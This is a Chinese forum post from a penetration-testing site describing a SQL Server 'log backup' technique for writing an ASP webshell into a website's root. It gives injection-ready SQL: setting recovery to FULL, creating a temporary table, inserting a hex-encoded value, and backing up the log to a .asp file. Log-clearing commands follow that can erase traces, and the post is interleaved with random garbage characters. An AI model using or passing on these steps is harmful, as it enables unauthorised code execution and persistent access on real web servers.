中国网络渗透测试联盟
标题:
差异备份提权
[打印本页]
作者:
admin
时间:
2012-9-15 14:38
标题:
差异备份提权
select * from master.dbo.sysdatabases 列出所有列的记录
/ h0 u2 f/ T: b: ?. N$ x1 ^* O: c
/ f. V) ~* y8 a* \% A
select name from master.dbo.sysdatabases 仅列出name列的记录
9 _7 {7 m Y" t- w o
. u# J4 N; i/ }6 _* U; D
注意:可以利用log和数据库备份两上都行,log备份不成功用数据库备份
f% _% O L) a2 {, t! p: @3 x
' K- ?: m& J7 S) c
alter database 数据库名 set RECOVERY FULL--
& B7 _5 g* ^; l9 a- g0 A
) D& h9 Q8 U! _2 [ V& z5 U& o: K4 ~
create table cmd (a image)-- \**cmd是创建的临时表
4 s( B$ S M- r( s" k- V
. i4 {& T+ X J
backup log 数据库名 to disk = 'f:\wwwroot\1.asp' with init--
7 D+ s: z% E" `+ s# p/ B
$ `! E/ {# @' C e! O9 x
insert into cmd(a) values (0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)--
( A J- X' l# ~8 U
& O6 y n. n0 K, S) O5 o! ]
//木马存放路径(转换16进制0x130a0d0a替换原来0x最后添加0d0a要多加几个)
; D5 E M, K( ~% N2 t6 J4 Z
4 m+ U9 h' d& x; n
backup log 数据库名 to disk = 'f:\wwwroot\1.asp'-- (要备份的目录)
, M& P b' t1 |. J+ E; L2 H
+ M F3 e9 l9 z2 w* U5 s7 ~
drop table cmd--
$ c) x! ]: y3 n; F& \
0 x( m3 G3 M9 x
- o2 A# P# ]0 h2 P* j" |: R
f:\
5 p- {1 a! i& e# F2 t1 O
16进制转换(0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)
/ X! J1 x9 K) U) Y& u, z4 o0 [" E( L
7 x7 V3 `$ t! c# p4 J, M
最好多加几个回车0d0a,要不会出错哈
3 @9 n" V5 t/ \
. h% n; X1 ?0 u1 ^
& `8 T4 Y5 E1 n
SQL Server日志清空方法
0 s, _ L- }* T6 E& f
3 _) U- j) j, M# X' d% {9 d0 }
在查询分析器中顺序执行以下三步,其中 databasename 为你的数据库文件名
% u: W8 W' B9 q
1.清空日志:DUMP TRANSACTION databasename WITH NO_LOG
7 m2 v/ U/ H4 ] P3 ]8 g: L
W% q9 o9 m0 F% W% P6 h; z/ n
2.截断事务日志:BACKUP LOG databasename WITH NO_LOG
" i: M8 W7 X! _( j- p: b
$ Q& c" \5 h' C" r
3.收缩数据库:DBCC SHRINKDATABASE(databasename)
; x9 Q" T c* f" v j$ K" e, M7 b
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2